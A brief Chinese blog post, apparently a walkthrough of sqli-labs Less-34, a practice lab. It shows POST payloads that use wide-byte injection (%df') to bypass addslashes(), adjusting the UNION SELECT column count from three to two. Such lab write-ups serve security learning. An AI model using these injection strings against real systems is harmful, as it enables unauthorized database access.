【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

还是宽字节注入,POST版本的

uname=1&passwd=1%df' union select 1,2,3#

提交报错

列名不匹配,改一下就好了

uname=1&passwd=1%df' union select 1,2#

看一下源码,果然只select了两个字段

 

posted @ 2018-01-30 12:36  omnis  阅读(557)  评论(0编辑  收藏  举报